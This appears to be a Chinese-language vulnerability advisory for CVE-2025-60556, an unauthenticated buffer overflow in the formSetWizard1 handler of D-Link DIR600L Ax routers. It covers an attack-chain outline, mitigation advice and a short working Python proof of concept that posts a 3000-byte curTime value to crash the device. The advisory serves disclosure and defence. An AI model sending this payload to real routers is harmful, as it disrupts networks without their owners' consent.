D-Link DIR600L Ax formSetWizard1函数缓冲区溢出漏洞(CVE-2025-60556)

漏洞信息

漏洞编号

CVE-2025-60556

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR600L Ax

漏洞概述

CVE-2025-60556是D-Link DIR600L Ax路由器固件(FW116WWb01)中的一个高危缓冲区溢出漏洞。该漏洞存在于formSetWizard1函数中，攻击者可以通过构造超长的curTime参数来触发缓冲区溢出。由于该漏洞无需认证即可远程利用，且可通过网络直接发起攻击，因此具有极高的安全风险。成功利用此漏洞可能导致路由器服务中断(拒绝服务)或潜在地执行任意代码，从而完全控制受影响设备。D-Link DIR600L系列路由器广泛应用于家庭和小型办公网络环境，该漏洞的存在使得大量终端用户面临被攻击的风险。建议受影响的用户尽快采取防御措施，避免设备暴露在互联网环境下。

技术细节

该漏洞为典型的栈缓冲区溢出漏洞。在D-Link DIR600L Ax路由器的Web管理界面中，formSetWizard1函数负责处理用户通过HTTP请求提交的curTime参数。当该函数接收到超长的curTime值时，由于缺乏适当的边界检查，输入数据会超出预先分配的缓冲区边界，覆盖相邻内存区域。攻击者无需任何认证凭据，仅需构造包含超长字符串的HTTP POST请求并发送到路由器的Web服务端口(通常为80或8080)。根据CVSS评分(7.5)，该漏洞主要影响系统的可用性，可导致路由器服务崩溃或重启。在某些情况下，攻击者可能利用此漏洞实现代码执行，从而获取设备的完全控制权。建议设备管理员及时更新固件版本，并避免将路由器管理界面暴露在公网环境下。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标D-Link DIR600L Ax路由器，确认其IP地址和Web管理界面可访问状态

STEP 2

步骤2: 构造恶意请求

攻击者构造包含超长curTime参数(3000+字节)的HTTP POST请求，目标端点为/goform/formSetWizard1

STEP 3

步骤3: 发送攻击载荷

通过无需认证的HTTP请求将恶意数据发送至路由器Web服务，由于formSetWizard1函数缺乏边界检查，超长字符串触发缓冲区溢出

STEP 4

步骤4: 触发漏洞

溢出的数据覆盖栈内存，可能导致程序崩溃、服务中断或潜在地控制程序执行流程

STEP 5

步骤5: 达成攻击目标

实现拒绝服务(DoS)攻击或获取设备控制权限，攻击者可能进一步利用路由器作为僵尸网络节点或内网渗透跳板

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://192.168.0.1'

# Buffer overflow payload - 3000 bytes of 'A' characters
# This exceeds the buffer size in formSetWizard1 function
buffer = 'A' * 3000

# Construct the exploit request
url = f'{target}/goform/formSetWizard1'
data = {
    'curTime': buffer,
    'wizard1': '0'
}

print(f'[*] Sending exploit to {url}')
print(f'[*] Payload size: {len(buffer)} bytes')

try:
    response = requests.post(url, data=data, timeout=10)
    print(f'[+] Request sent successfully')
    print(f'[+] Status code: {response.status_code}')
except requests.exceptions.Timeout:
    print('[+] Target did not respond (possible crash)')
except requests.exceptions.ConnectionError:
    print('[+] Connection failed - target may be down')
except Exception as e:
    print(f'[-] Error: {e}')

影响范围

D-Link DIR600L Ax FW116WWb01

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1)立即将路由器Web管理界面从公网移除，仅允许通过内网访问；2)在路由器上游设备(如主路由或防火墙)上部署访问控制列表(ACL)，限制对D-Link路由器管理端口的访问源IP；3)监控网络流量，及时发现针对该漏洞的扫描和攻击行为；4)考虑暂时使用替代设备替代D-Link DIR600L Ax，待官方发布固件更新后再恢复使用；5)如果业务允许，可考虑更换为其他品牌路由器以彻底消除该安全风险。